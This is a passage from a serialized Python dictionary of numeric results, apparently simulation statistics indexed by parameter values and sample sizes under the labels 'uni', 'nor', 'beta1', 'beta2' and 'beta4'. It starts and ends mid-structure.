{'uni': 0.09438397276573021, 'nor': 0.14904746557912396, 'beta1': 0.09398651936888375, 'beta2': 0.16721766000932792, 'beta4': 0.07618184832746211}, 200: {'uni': 0.11527057686285336, 'nor': 0.1642522242508767, 'beta1': 0.11389959855243442, 'beta2': 0.18023752667719684, 'beta4': 0.09672312219072954}, 150: {'uni': 0.13216312596618518, 'nor': 0.1751857316995788, 'beta1': 0.1302080010184946, 'beta2': 0.1927573270242654, 'beta4': 0.11238481899540864}, 100: {'uni': 0.16076877833678727, 'nor': 0.19975581943363707, 'beta1': 0.16079488576960266, 'beta2': 0.20995618985866715, 'beta4': 0.14127998845587303}, 75: {'uni': 0.18434632621362634, 'nor': 0.21848200560175463, 'beta1': 0.18642816894352734, 'beta2': 0.23061939766314457, 'beta4': 0.16533631802523197}, 50: {'uni': 0.22724922024813737, 'nor': 0.2584378792366021, 'beta1': 0.22695557193281157, 'beta2': 0.2675887560653766, 'beta4': 0.20740264516587753}, 30: {'uni': 0.2918722908611385, 'nor': 0.3155005347993203, 'beta1': 0.2926574234664835, 'beta2': 0.3225067701718885, 'beta4': 0.27375474423769725}, 20: {'uni': 0.3454149675998711, 'nor': 0.37444691882619846, 'beta1': 0.3534455881933011, 'beta2': 0.37908898284769055, 'beta4': 0.33782534459856733}, 10: {'uni': 0.48995308583601727, 'nor': 0.5057924764345054, 'beta1': 0.48712627773712436, 'beta2': 0.509289943720692, 'beta4': 0.4760256361246777}}, 75: {1000: {'uni': 0.05263806893207712, 'nor': 0.1426387862890096, 'beta1': 0.050861516064434786, 'beta2': 0.1550912428095914, 'beta4': 0.03942562584827963}, 750: {'uni': 0.05987895965521034, 'nor': 0.14543562438841662, 'beta1': 0.05843122916552068, 'beta2': 0.1621832342719166, 'beta4': 0.04641508440087805}, 500: {'uni': 0.0729716053027788, 'nor': 0.14981406322703128, 'beta1': 0.07136667899438129, 'beta2': 0.16497360040986309, 'beta4': 0.05736466968785836}, 400: {'uni': 0.08175178171124547, 'nor': 0.15594408152690709, 'beta1': 0.08094487541872952, 'beta2': 0.17052351554071665, 'beta4': 0.0643906104219426}, 300: {'uni': 0.09174467790257729, 'nor': 0.16325422501166353, 'beta1': 0.09381129166957458, 'beta2': 0.17484070317567046, 'beta4': 0.07488233712902187}, 200: {'uni': 0.11347575789530223, 'nor': 0.17663300299982598, 'beta1': 0.11326725293489726, 'beta2': 0.1883129177850832, 'beta4': 0.0942089295423881}, 150: {'uni': 0.131120018205924, 'nor': 0.19093489533419694, 'beta1': 0.13205247166475537, 'beta2': 0.19914811519378778, 'beta4': 0.11204039761886475}, 100: {'uni': 0.16082564475037464, 'nor': 0.20856290260278498, 'beta1': 0.1625220254469636, 'beta2': 0.22253364361870465, 'beta4': 0.13842685894102613}, 75: {'uni': 0.18769569670626118, 'nor': 0.22923558297249835, 'beta1': 0.18448259911628095, 'beta2': 0.23782557049636, 'beta4': 0.16392283350600595}, 50: {'uni': 0.22331353175762125, 'nor': 0.26715148642337594, 'beta1': 0.22668241788193566, 'beta2': 0.26824852802663934, 'beta4': 0.20334391006072833}, 30: {'uni': 0.289473862453717, 'nor': 0.3214887737505831, 'beta1': 0.2875485914729527, 'beta2': 0.32630978396412536, 'beta4': 0.2697829912702217}, 20: {'uni': 0.3511642946869532, 'nor': 0.3751483594090778, 'beta1': 0.352409931529952, 'beta2': 0.3784846745898291, 'beta4': 0.33540408314790005}, 10: {'uni': 0.488706375026184, 'nor': 0.5055985987947458, 'beta1': 0.4929217350189299, 'beta2': 0.5091039256808894, 'beta4': 0.4781596967150431}}, 50: {1000: {'uni': 0.054187095918339256, 'nor': 0.16627808992474102, 'beta1': 0.05074852615107739, 'beta2': 0.17412185904693311, 'beta4': 0.039691505151292106}, 750: {'uni': 0.062058115432295474, 'nor': 0.17238046742698188, 'beta1': 0.059084035023102, 'beta2': 0.17597952934137606, 'beta4': 0.04541331900508322}, 500: {'uni': 0.07423220817161519, 'nor': 0.1792687852250358, 'beta1': 0.07197857057706736, 'beta2': 0.1818195777041135, 'beta4': 0.05569462226316452}, 400: {'uni': 0.08254206840442069, 'nor': 0.1825333888879272, 'beta1': 0.08099479940703191, 'beta2': 0.18984048447922675, 'beta4': 0.06357941522010713}, 300: {'uni': 0.09474363323614166, 'nor': 0.18834315888900854, 'beta1': 0.09343612898219089, 'beta2': 0.1924669867698795, 'beta4': 0.07309401794651404}, 200: {'uni': 0.11623368179709986, 'nor': 0.20107102192718945, 'beta1': 0.1147080452043604, 'beta2': 0.20330128778291234, 'beta4': 0.09144934593281676}, 150: {'uni': 0.13323158697545257, 'nor': 0.2113741612304923, 'beta1': 0.13089326840146875, 'beta2': 0.21101409732714788, 'beta4': 0.1080905839738153}, 100: {'uni': 0.1610409156149188, 'nor': 0.23200918860179387, 'beta1': 0.16001862287729518, 'beta2': 0.23225218169591122, 'beta4': 0.13330220075686566}, 75: {'uni': 0.18275303987938896, 'nor': 0.2503116552370775, 'beta1': 0.18535594744801204, 'beta2': 0.2435558750806069, 'beta4': 0.15726325930804558}, 50: {'uni': 0.2246149371985376, 'nor': 0.2833867880515266, 'beta1': 0.22456825644221368, 'beta2': 0.27550623451671474, 'beta4': 0.1978109061797627}, 30: {'uni': 0.2872878605199388, 'nor': 0.3386232243962164, 'beta1': 0.28579575210477914, 'beta2': 0.33471410391675205, 'beta4': 0.26584890073856127}, 20: {'uni': 0.3523359671395369, 'nor': 0.3883193259633752, 'beta1': 0.34980199502356346, 'beta2': 0.38521307572061386, 'beta4': 0.32550253808599006}, 10: {'uni': 0.48543686550596693, 'nor': 0.5182694839209849, 'beta1': 0.49221988171682085, 'beta2': 0.5153967620456474, 'beta4': 0.4700594688479634}}, 30: {1000: {'uni': 0.058918924239352466, 'nor': 0.21297337163268276, 'beta1': 0.0518167432973049, 'beta2': 0.195446267914975, 'beta4': 0.03908638506448431}, 750: {'uni': 0.06572796327401753, 'nor': 0.21595057482420588, 'beta1': 0.059259512312420104, 'beta2': 0.19755323997975416, 'beta4': 0.045197433532028874}, 500: {'uni': 0.07686236514630335, 'nor': 0.22226563318166248, 'beta1': 0.07177928002902467, 'beta2': 0.2056526292300077, 'beta4': 0.05493149389715696}, 400: {'uni': 0.08465975831568184, 'nor': 0.2252684454523387, 'beta1': 0.08123930027330767, 'beta2': 0.2099099100664712, 'beta4': 0.06217418123201823}, 300: {'uni': 0.09651070474378282, 'nor': 0.2300730633949879, 'beta1': 0.09323619984546516, 'beta2': 0.2120833703149353, 'beta4': 0.07312418047556249}, 200: {'uni': 0.11605617135066404, 'nor': 0.2431502125103765, 'beta1': 0.11353867501894094, 'beta2': 0.21682074894377878, 'beta4': 0.08933031413363546}, 150: {'uni': 0.13410472341858543, 'nor': 0.24725518547910333, 'beta1': 0.1318999891275866, 'beta2': 0.22942799747160325, 'beta4': 0.10272810181706044}, 100: {'uni': 0.16196955748999547, 'nor': 0.2700012320341486, 'beta1': 0.15871486988261296, 'beta2': 0.24514818382512593, 'beta4': 0.13010131517540321}, 75: {'uni': 0.1835418878236575, 'nor': 0.28467491610667683, 'beta1': 0.18546450563511369, 'beta2': 0.26290322403314065, 'beta4': 0.15276528672305534}, 50: {'uni': 0.22509609698193117, 'nor': 0.3142329116082755, 'beta1': 0.22663224055326758, 'beta2': 0.2919325149774068, 'beta4': 0.18996462242195666}, 30: {'uni': 0.2897752445348868, 'nor': 0.359326156047137, 'beta1': 0.29020063665136886, 'beta2': 0.34273751996321067, 'beta4': 0.2529174520482719}, 20: {'uni': 0.344005648632975, 'nor': 0.42004384529396105, 'beta1': 0.34658611138046264, 'beta2': 0.3902673253680207, 'beta4': 0.31692923991569927}, 10: {'uni': 0.4837000884491306, 'nor': 0.5316468101838533, 'beta1': 0.48249080675172323, 'beta2': 0.5194341288716998, 'beta4': 0.4603664888921414}}, 20: {1000: {'uni': 0.06597487107762767, 'nor': 0.26293245683028, 'beta1': 0.05120820169191942, 'beta2': 0.22017115245446095, 'beta4': 0.038916881153397975}, 750: {'uni': 0.07269217456814536, 'nor': 0.2667557058726879, 'beta1': 0.059583644657734885, 'beta2': 0.2217993564160058, 'beta4': 0.04508243513408289}, 500: {'uni': 0.08323814797112672, 'nor': 0.2728795944957957, 'beta1': 0.07257265729126575, 'beta2': 0.2282291849514998, 'beta4': 0.055068233755242446}, 400: {'uni': 0.09072350595679135, 'nor': 0.2723668419179453, 'beta1': 0.08056174054012066, 'beta2': 0.22597367362057608, 'beta4': 0.06169261835040951}, 300: {'uni': 0.10083188986577823, 'nor': 0.27712117006626796, 'beta1': 0.09318059105121618, 'beta2': 0.23326141016132318, 'beta4': 0.07091172628182563}, 200: {'uni': 0.12110756732550038, 'nor': 0.2855441269934709, 'beta1': 0.1157486267208615, 'beta2': 0.23795719725720738, 'beta4': 0.08927441431005056}, 150: {'uni': 0.13598733501466506, 'nor': 0.2907323977734544, 'beta1': 0.13109115777861102, 'beta2': 0.25318192125603234, 'beta4': 0.10332852211836979}, 100: {'uni': 0.1639431522658722, 'nor': 0.31152417983746605, 'beta1': 0.16155024590107747, 'beta2': 0.262103768140855, 'beta4': 0.12609462698530394}, 75: {'uni': 0.18685165128081893, 'nor': 0.3254693717012144, 'beta1': 0.18397251726711683, 'beta2': 0.27915696455084993, 'beta4': 0.14785181380565982}, 50: {'uni': 0.22761062573955604, 'nor': 0.3522320739163892, 'beta1': 0.2256099922364685, 'beta2': 0.30883291813380065, 'beta4': 0.18365089973024573}, 30: {'uni': 0.289203483511623, 'nor': 0.4011670663050516, 'beta1': 0.2891477181429253, 'beta2': 0.35472219797014837, 'beta4': 0.24745951418710105}, 20: {'uni': 0.34667459614575846, 'nor': 0.44850723188809377, 'beta1': 0.35113197277916386, 'beta2': 0.4044647849108889, 'beta4': 0.3126967400538809}, 10: {'uni': 0.48476115016520405, 'nor': 0.554406017917817, 'beta1': 0.4817528515392736, 'beta2': 0.5313493222964868, 'beta4': 0.4483656416548137}}, 10: {1000: {'uni': 0.09689632012426586, 'nor': 0.37891222572877614, 'beta1': 0.09112144529033561, 'beta2': 0.2586988400624156, 'beta4': 0.03900835588583823}, 750: {'uni': 0.10064795489220457, 'nor': 0.383188375068864, 'beta1': 0.09112850229049962, 'beta2': 0.2640286285324004, 'beta4': 0.04502182335240068}, 500: {'uni': 0.10802210321588324, 'nor': 0.3884962880934829, 'beta1': 0.0911721599997744, 'beta2': 0.27079265676023156, 'beta4': 0.05453895677656284}, 400: {'uni': 0.11304279449008725, 'nor': 0.3889920925008913, 'beta1': 0.0912685747102537, 'beta2': 0.26870553332669633, 'beta4': 0.0616433432574133}, 300: {'uni': 0.12154400796026772, 'nor': 0.39206198235198325, 'beta1': 0.09483352592096467, 'beta2': 0.2724084181642078, 'beta4': 0.07113409099304874}, 200: {'uni': 0.1347088080476393, 'nor': 0.3989961151096316, 'beta1': 0.11465623517387658, 'beta2': 0.2801925598985867, 'beta4': 0.08778892448680453}, 150: {'uni': 0.14950650016574885, 'nor': 0.4074020676124349, 'beta1': 0.1319362581048737, 'beta2': 0.2882295441811764, 'beta4': 0.09979505237411807}, 100: {'uni': 0.1746199496093277, 'nor': 0.41995987192595596, 'beta1': 0.1606353579518667, 'beta2': 0.3046266455964683, 'beta4': 0.12499057927159085}, 75: {'uni': 0.1963173328176369, 'nor': 0.4305939349118369, 'beta1': 0.1853892160990983, 'beta2': 0.3141345572002111, 'beta4': 0.14329993044048847}, 50: {'uni': 0.23406933928651003, 'nor': 0.4528491146162036, 'beta1': 0.22664378023198406, 'beta2': 0.3345469784583225, 'beta4': 0.17784420010893143}, 30: {'uni': 0.29324923220629134, 'nor': 0.4874432234123751, 'beta1': 0.2893385819235859, 'beta2': 0.3762716610461486, 'beta4': 0.2340649401769095}, 20: {'uni': 0.35290644687931416, 'nor': 0.5339309604641884, 'beta1': 0.3494325720267195, 'beta2': 0.42149057999190237, 'beta4': 0.29349793334316515}, 10: {'uni': 0.4819570489345161, 'nor': 0.621282121995842, 'beta1': 0.48228312064803025, 'beta2': 0.531072925087128, 'beta4': 0.42676946077577815}}}, 0.05: {1000: {1000: {'uni': 0.04250873596535332, 'nor': 0.05211322056354162, 'beta1': 0.04306205955872783, 'beta2': 0.08035999046629705, 'beta4': 0.03797796698498185}, 750: {'uni': 0.04939044076050647, 'nor': 0.057928759168451305, 'beta1': 0.04956386512094496, 'beta2': 0.08255880301550844, 'beta4': 0.04460825923337863}, 500: {'uni': 0.060593693593500864, 'nor': 0.06752114560687372, 'beta1': 0.060391364928257474, 'beta2': 0.08816209252857421, 'beta4': 0.05607127534968437}, 400: {'uni': 0.0673055881110432, 'nor': 0.07339531978449776, 'beta1': 0.06742981404562332, 'beta2': 0.09222999610749227, 'beta4': 0.06293590114601089}, 300: {'uni': 0.07829316510351103, 'nor': 0.08373775958480117, 'beta1': 0.07775258426053894, 'beta2': 0.10010817811684236, 'beta4': 0.07394283107208066}, 200: {'uni': 0.09529933382323597, 'nor': 0.10000749443187817, 'beta1': 0.09514079230112737, 'beta2': 0.11393345537368338, 'beta4': 0.0917178764665584}, 150: {'uni': 0.1095050668662032, 'nor': 0.1131765255844498, 'beta1': 0.10961338251417468, 'beta2': 0.12625941180627626, 'beta4': 0.10701383836580813}, 100: {'uni': 0.13504293819410917, 'nor': 0.13789756284368515, 'beta1': 0.13448261128725092, 'beta2': 0.1469163714586994, 'beta4': 0.13105762405283972}, 75: {'uni': 0.15512998752952264, 'nor': 0.15736947708421162, 'beta1': 0.15460254067269846, 'beta2': 0.16654377290913044, 'beta4': 0.1511024290565549}, 50: {'uni': 0.18856009448236644, 'nor': 0.1906997936343151, 'beta1': 0.1884576993592476, 'beta2': 0.1982428759858742, 'beta4': 0.18622204644381843}, 30: {'uni': 0.2398807672306324, 'nor': 0.24412240717703027, 'beta1': 0.24053994368488707, 'beta2': 0.24870244801951652, 'beta4': 0.23887135097093648}, 20: {'uni': 0.29368464372283687, 'nor': 0.2955974928774556, 'beta1': 0.2925421511499017, 'beta2': 0.29823721632962963, 'beta4': 0.2937927014266898}, 10: {'uni': 0.40809844072326357, 'nor': 0.40905711558389374, 'beta1': 0.4074293842569355, 'beta2': 0.41442818653088903, 'beta4': 0.4102533723801786}}, 750: {1000: {'uni': 0.04313132347462212, 'nor': 0.055054467531027274, 'beta1': 0.042903624792836825, 'beta2': 0.08085753121993888, 'beta4': 0.037165583736955776}, 750: {'uni': 0.04934405850774021, 'nor': 0.06012658528358911, 'beta1': 0.04926360659177581, 'beta2': 0.08292295419216378, 'beta4': 0.04421364295003938}, 500: {'uni': 0.060341804714815095, 'nor': 0.07033647349548888, 'beta1': 0.060558717006613694, 'beta2': 0.08863522371969174, 'beta4': 0.05517938622481133}, 400: {'uni': 0.06747724189757476, 'nor': 0.07601553392118676, 'beta1': 0.06753738114806768, 'beta2': 0.09286935098393112, 'beta4': 0.06258866218729964}, 300: {'uni': 0.0779234041757913, 'nor': 0.08581112098260912, 'beta1': 0.07752436380641886, 'beta2': 0.10025969540588678, 'beta4': 0.0727070225966075}, 200: {'uni': 0.09529011628998052, 'nor': 0.10157134239672405, 'beta1': 0.09532196270657745, 'beta2': 0.114717619457614, 'beta4': 0.09084936265846794}, 150: {'uni': 0.10929839951597176, 'nor': 0.11416074257244094, 'beta1': 0.10964416703357704, 'beta2': 0.1261134555516631, 'beta4': 0.10586630629141039}, 100: {'uni': 0.13402537604739173, 'nor': 0.13946500057705635, 'beta1': 0.13339315942045915, 'beta2': 0.14779247908517917, 'beta4': 0.12987399411308242}, 75: {'uni': 0.15491927659856863, 'nor': 0.15726063343810553, 'beta1': 0.15463569652056147, 'beta2': 0.1679004949850389, 'beta4': 0.1524841664459506}, 50: {'uni': 0.18831823725744598, 'nor': 0.19163748416973814, 'beta1': 0.1884166302028113, 'beta2': 0.19811874878971442, 'beta4': 0.18759940893926474}, 30: {'uni': 0.24249816383380124, 'nor': 0.2448871814993652, 'beta1': 0.24185014536823451, 'beta2': 0.24980128317227762, 'beta4': 0.2421287830978741}, 20: {'uni': 0.2940118546518854, 'nor': 0.29331856753560476, 'beta1': 0.29360254728317475, 'beta2': 0.30182924197426564, 'beta4': 0.29353502143027616}, 10: {'uni': 0.4087141031810262, 'nor': 0.41170613228789243, 'beta1': 0.4094888928024222, 'beta2': 0.41617469535239165, 'beta4': 0.4111278779658915}}, 500: {1000: {'uni': 0.0429345704660003, 'nor': 0.05932234329262365, 'beta1': 0.042727156109620246, 'beta2': 0.08510210997179135, 'beta4': 0.036257982752805895}, 750: {'uni': 0.049265441580142344, 'nor': 0.06453072581186886, 'beta1': 0.04952462754419623, 'beta2': 0.0880626740533288, 'beta4': 0.04274970287381094}, 500: {'uni': 0.06051345692735122, 'nor': 0.07405810203028496, 'beta1': 0.06013137064686658, 'beta2': 0.09405433515075423, 'beta4': 0.05362451219159059}, 400: {'uni': 0.06726638579663013, 'nor': 0.0793534053635837, 'beta1': 0.06761300772776771, 'beta2': 0.0996414553379194, 'beta4': 0.061074275253972965}, 300: {'uni': 0.07752111447176113, 'nor': 0.08853014421612171, 'beta1': 0.07790127912387818, 'beta2': 0.10591589294909354, 'beta4': 0.07149101529018864}, 200: {'uni': 0.09553432289253411, 'nor': 0.10474513086458981, 'beta1': 0.09491138965654433, 'beta2': 0.11924936822193555, 'beta4': 0.089970363011452}, 150: {'uni': 0.11049256971537569, 'nor': 0.11834670194031227, 'beta1': 0.11055795759911412, 'beta2': 0.13284580636545373, 'beta4': 0.1045099293615413}, 100: {'uni': 0.1325888031595155, 'nor': 0.1416642277128064, 'beta1': 0.13487031887436052, 'beta2': 0.15320832506486431, 'beta4': 0.12989554029630124}, 75: {'uni': 0.15407104188981624, 'nor': 0.1599128393935123, 'beta1': 0.15374710784163467, 'beta2': 0.16941911839219415, 'beta4': 0.150389415793519}, 50: {'uni': 0.18908047311103032, 'nor': 0.19373367790298657, 'beta1': 0.18889964131492282, 'beta2': 0.20132986679665088, 'beta4': 0.1846732957113127}, 30: {'uni': 0.24226077908740745, 'nor': 0.24727230642152115, 'beta1': 0.24238358313543917, 'beta2': 0.2513661790960438, 'beta4': 0.23977316063110243}, 20: {'uni': 0.2932302698568148, 'nor': 0.2947506771756141, 'beta1': 0.2938361058917397, 'beta2': 0.30338566870485817, 'beta4': 0.2894081827795897}, 10: {'uni': 0.4095412142044333, 'nor': 0.41582272767182626, 'beta1': 0.4091307634899183, 'beta2': 0.41139636575315974, 'beta4': 0.4078258054114057}}, 400: {1000: {'uni': 0.04255614948733477, 'nor': 0.06271520295830779, 'beta1': 0.042499298590381596, 'beta2': 0.08456650823704548, 'beta4': 0.03580234989921294}, 750: {'uni': 0.04937518706328403, 'nor': 0.06777109574937312, 'beta1': 0.049367906001651085, 'beta2': 0.08730333067407448, 'beta4': 0.04221923686249307}, 500: {'uni': 0.06056747910036231, 'nor': 0.07722766386556512, 'beta1': 0.060303960376819954, 'beta2': 0.09289270953205328, 'beta4': 0.05248883908484214}, 400: {'uni': 0.06728484592171763, 'nor': 0.08236276990821306, 'beta1': 0.06746558979046141, 'beta2': 0.09825313200635855, 'beta4': 0.06025406262496252}, 300: {'uni': 0.07820323026110898, 'nor': 0.09073559074460608, 'beta1': 0.07821541358546946, 'beta2': 0.10636367292497817, 'beta4': 0.0707215219370873}, 200: {'uni': 0.09539601064885839, 'nor': 0.10556303670070322, 'beta1': 0.09561582053237683, 'beta2': 0.12180562887877411, 'beta4': 0.08801801823329147}, 150: {'uni': 0.10936714369824918, 'nor': 0.11926537223910565, 'beta1': 0.10969157845228705, 'beta2': 0.13244557387181255, 'beta4': 0.10341522850743123}, 100: {'uni': 0.13354393257412983, 'nor': 0.1423512660895025, 'beta1': 0.1349214446210324, 'beta2': 0.15303126855995564, 'beta4': 0.12836102685714074}, 75: {'uni': 0.1539128338395579, 'nor': 0.16324678205317678, 'beta1': 0.15405133046909722, 'beta2': 0.17098592920893618, 'beta4': 0.14957593956825316}, 50: {'uni': 0.18775635329386392, 'nor': 0.1937191005204043, 'beta1': 0.1884271730141419, 'beta2': 0.20435458644695162, 'beta4': 0.1843870264363775}, 30: {'uni': 0.24284157129386047, 'nor': 0.24629860436826123, 'beta1': 0.2408640216307077, 'beta2': 0.25171500005639674, 'beta4': 0.23632331131142947}, 20: {'uni': 0.294735259283024, 'nor': 0.3000105461174386, 'beta1': 0.29458072221349885, 'beta2': 0.3014785462051059, 'beta4': 0.2909045447121572}, 10: {'uni': 0.4103919628714764, 'nor': 0.41225052464658113, 'beta1': 0.41060821792134156, 'beta2': 0.4163793146371585, 'beta4': 0.40742898042098596}}, 300: {1000: {'uni': 0.042894438722122286, 'nor': 0.06804466454865021, 'beta1': 0.042975744332918175, 'beta2': 0.0888244060704032, 'beta4': 0.03506422723776037}, 750: {'uni': 0.04935072830414078, 'nor': 0.0725923011358739, 'beta1': 0.04961504811513984, 'beta2': 0.09140206098548131, 'beta4': 0.04167378331875227}, 500: {'uni': 0.06083268710478407, 'nor': 0.08079774711138776, 'beta1': 0.060462958380593346, 'beta2': 0.09864492613316656, 'beta4': 0.05224950308205284}, 400: {'uni': 0.06740667823442481, 'nor': 0.08662549045486634, 'beta1': 0.06812433004180829, 'beta2': 0.10449231525526514, 'beta4': 0.05889668522599231}, 300: {'uni': 0.07759043263185894, 'nor': 0.09466518723563278, 'beta1': 0.07761370429428577, 'beta2': 0.11256171095061174, 'beta4': 0.06901393087520213}, 200: {'uni': 0.09501186068000178, 'nor': 0.11045546634746517, 'beta1': 0.09545154794009353, 'beta2': 0.12529152669670096, 'beta4': 0.08590491171623238}, 150: {'uni': 0.10913769973038989, 'nor': 0.12308354696458895, 'beta1': 0.10968689772848039, 'beta2': 0.1357602716808839, 'beta4': 0.1014492424455633}, 100: {'uni': 0.13555693310048833, 'nor': 0.14414239978154153, 'beta1': 0.13509394899970356, 'beta2': 0.15724894818388713, 'beta4': 0.12712742588054968}, 75: {'uni': 0.1528796701368813, 'nor': 0.16337025975562974, 'beta1': 0.15343029335140113, 'beta2': 0.17613550383491916, 'beta4': 0.14800406699526014}, 50: {'uni': 0.18792883570862817, 'nor': 0.19765009586613413, 'beta1': 0.18912520193521853, 'beta2': 0.2052442637463902, 'beta4': 0.1817694823681486}, 30: {'uni': 0.24126343910617895, 'nor': 0.24731827586722788, 'beta1': 0.24270517877017284, 'beta2': 0.2557802201638789, 'beta4': 0.23627972110713036}, 20: {'uni': 0.2926059984655144, 'nor': 0.2986919482722732, 'beta1': 0.2923500002958017, 'beta2': 0.30460634421517385, 'beta4': 0.28973301373812854}, 10: {'uni': 0.4102473624031447, 'nor': 0.415040095717406, 'beta1': 0.4086610684156582, 'beta2': 0.41242893849078294, 'beta4': 0.40337056089025664}}, 200: {1000: {'uni': 0.04292620281905324, 'nor': 0.07789366288788169, 'beta1': 0.042909295701843875, 'beta2': 0.09598401017764835, 'beta4': 0.03444818222651283}, 750: {'uni': 0.049116893075300094, 'nor': 0.08192589013572071, 'beta1': 0.049261303877093376, 'beta2': 0.09942309864768661, 'beta4': 0.04066451451600811}, 500: {'uni': 0.06050980125495031, 'nor': 0.08870178975680876, 'beta1': 0.06019971884940478, 'beta2': 0.10568112520914552, 'beta4': 0.050818961275074126}, 400: {'uni': 0.06739439830856109, 'nor': 0.09366639653726616, 'beta1': 0.06764647221850328, 'beta2': 0.11327801797692638, 'beta4': 0.05737622556223043}, 300: {'uni': 0.07777244883862433, 'nor': 0.10218475647374542, 'beta1': 0.07789235265143774, 'beta2': 0.11913850063835685, 'beta4': 0.0674525332548831}, 200: {'uni': 0.09502704520860905, 'nor': 0.11604045896624948, 'beta1': 0.09510463516896728, 'beta2': 0.13172961091169733, 'beta4': 0.0847162185101194}, 150: {'uni': 0.11016636440205546, 'nor': 0.12811765905677236, 'beta1': 0.10970368873875014, 'beta2': 0.14331145199787, 'beta4': 0.09995453264910176}, 100: {'uni': 0.13445642653897671, 'nor': 0.1497382854380087, 'beta1': 0.13348683808905348, 'beta2': 0.16329669247250422, 'beta4': 0.12465846974308342}, 75: {'uni': 0.15419888978141394, 'nor': 0.16923478439093248, 'beta1': 0.1534954671086292, 'beta2': 0.17909152766875147, 'beta4': 0.14538034559889523}, 50: {'uni': 0.1867393471217101, 'nor': 0.19994040891868026, 'beta1': 0.18704772643881146, 'beta2': 0.20860701598862752, 'beta4': 0.18028390140578754}, 30: {'uni': 0.24085839007149673, 'nor': 0.25196638732921794, 'beta1': 0.2416028527023132, 'beta2': 0.258985786530043, 'beta4': 0.23484197182299332}, 20: {'uni': 0.2938289434391539, 'nor': 0.30183924391245415, 'beta1': 0.2929710538077763, 'beta2': 0.30847428056222437, 'beta4': 0.2887648891428266}, 10: {'uni': 0.409241850795313, 'nor': 0.41624360452445025, 'beta1': 0.4073016819406742, 'beta2': 0.41919073368911525, 'beta4': 0.4050765267408517}}, 150: {1000: {'uni': 0.04291723660518407, 'nor': 0.08563558848858943, 'beta1': 0.042846891281439425, 'beta2': 0.10223899504388945, 'beta4': 0.03395439572798897}, 750: {'uni': 0.04950013649203988, 'nor': 0.08925938870000594, 'beta1': 0.04965224665621104, 'beta2': 0.10696078885236882, 'beta4': 0.040016846887239776}, 500: {'uni': 0.06056262216642466, 'nor': 0.09643747097853617, 'beta1': 0.060400676674767784, 'beta2': 0.11473400680347212, 'beta4': 0.04951486955132711}, 400: {'uni': 0.06764529037263078, 'nor': 0.10144512010371015, 'beta1': 0.06753205660512529, 'beta2': 0.11877629190302957, 'beta4': 0.05635636540840383}, 300: {'uni': 0.07833927823257347, 'nor': 0.10837393046444554, 'beta1': 0.07800217882792032, 'beta2': 0.12395861166633126, 'beta4': 0.06599964488218174}, 200: {'uni': 0.09545996993358469, 'nor': 0.12238507175537305, 'beta1': 0.09520988149732268, 'beta2': 0.13705221967657688, 'beta4': 0.0834232463067639}, 150: {'uni': 0.10950500818109843, 'nor': 0.13336780634865708, 'beta1': 0.10925207483454008, 'beta2': 0.14838697874181017, 'beta4': 0.09817686727672598}, 100: {'uni': 0.13308106007624088, 'nor': 0.15584852299459984, 'beta1': 0.13507681514120773, 'beta2': 0.16768636533102133, 'beta4': 0.12178061197560497}, 75: {'uni': 0.15418797319776234, 'nor': 0.17295736209751258, 'beta1': 0.154058224278319, 'beta2': 0.1837034986222184, 'beta4': 0.14349011466146278}, 50: {'uni': 0.18847911332805245, 'nor': 0.20361778090060745, 'beta1': 0.1875078531942039, 'beta2': 0.21225663088149105, 'beta4': 0.17857036568803114}, 30: {'uni': 0.24059443804418118, 'nor': 0.2533108674087146, 'beta1': 0.24179550981403275, 'beta2': 0.26178390187576706, 'beta4': 0.23390865892313567}, 20: {'uni': 0.2937042322632649, 'nor': 0.3041869530968494, 'beta1': 0.29418747362409225, 'beta2': 0.3085038537053799, 'beta4': 0.28520167726380585}, 10: {'uni': 0.4096756554001893, 'nor': 0.4139326107135924, 'beta1': 0.40764137118865473, 'beta2': 0.4204038401226778, 'beta4': 0.40388108256901817}}, 100: {1000: {'uni': 0.04342664844495059, 'nor': 0.09884840155194324, 'beta1': 0.04276716681381737, 'beta2': 0.11054081774012758, 'beta4': 0.03371827577803044}, 750: {'uni': 0.049919916608987536, 'nor': 0.10252531304078716, 'beta1': 0.049091134507803946, 'beta2': 0.11423138192179594, 'beta4': 0.039323577549201905}, 500: {'uni': 0.06043645792785113, 'nor': 0.10917860950531716, 'beta1': 0.06024574518941972, 'beta2': 0.12114708952686687, 'beta4': 0.04863716851296296}, 400: {'uni': 0.06810271497020282, 'nor': 0.11445445573077262, 'beta1': 0.0680246885765276, 'beta2': 0.12474816718751847, 'beta4': 0.05470345449215924}, 300: {'uni': 0.07806624398748752, 'nor': 0.12160241052743598, 'beta1': 0.07813676478342219, 'beta2': 0.1303621178249335, 'beta4': 0.06435103186819638}, 200: {'uni': 0.09516451469508691, 'nor': 0.13371593064376386, 'beta1': 0.09486007398939739, 'beta2': 0.14197473394490534, 'beta4': 0.08070835746272365}, 150: {'uni': 0.10951349007838795, 'nor': 0.1448092189751769, 'beta1': 0.11000810280674456, 'beta2': 0.15405644251908213, 'beta4': 0.09448304115287848}, 100: {'uni': 0.13402144727255166, 'nor': 0.16360851635146456, 'beta1': 0.13373829847036145, 'beta2': 0.17388573367926863, 'beta4': 0.11887279870190737}, 75: {'uni': 0.1534775863899963, 'nor': 0.18082984868868635, 'beta1': 0.15472434640745825, 'beta2': 0.18922729311202852, 'beta4': 0.14064103105650327}, 50: {'uni': 0.1878076047125296, 'nor': 0.21174139971723732, 'beta1': 0.18900505952391644, 'beta2': 0.21597325299721343, 'beta4': 0.17504570451647083}, 30: {'uni': 0.24109983939699636, 'nor': 0.26128460107527085, 'beta1': 0.24202652974714423, 'beta2': 0.26394060641591655, 'beta4': 0.22998071380591711}, 20: {'uni': 0.29266727403084003, 'nor': 0.3103114840471122, 'beta1': 0.29512024524547165, 'beta2': 0.31286929353450027, 'beta4': 0.2848189838493475}, 10: {'uni': 0.4067165104704334, 'nor': 0.4189143169125569, 'beta1': 0.4090630015368414, 'beta2': 0.42152641633430715, 'beta4': 0.4002321833577583}}, 75: {1000: {'uni': 0.0438399424685616, 'nor': 0.11214377089086885, 'beta1': 0.04280400130427986, 'beta2': 0.11639932218811577, 'beta4': 0.033393127995971994}, 750: {'uni': 0.050249501777054006, 'nor': 0.11453879357778812, 'beta1': 0.0491045026978259, 'beta2': 0.12063794198664923, 'beta4': 0.03872341367170215}, 500: {'uni': 0.06108895227688799, 'nor': 0.12072978462890072, 'beta1': 0.0601270340866209, 'beta2': 0.12562241974534927, 'beta4': 0.04827155944884867}, 400: {'uni': 0.06782565480281566, 'nor': 0.12548350271549236, 'beta1': 0.06724131663497068, 'beta2': 0.12960446320697638, 'beta4': 0.05409657961615677}, 300: {'uni': 0.07851141408408377, 'nor': 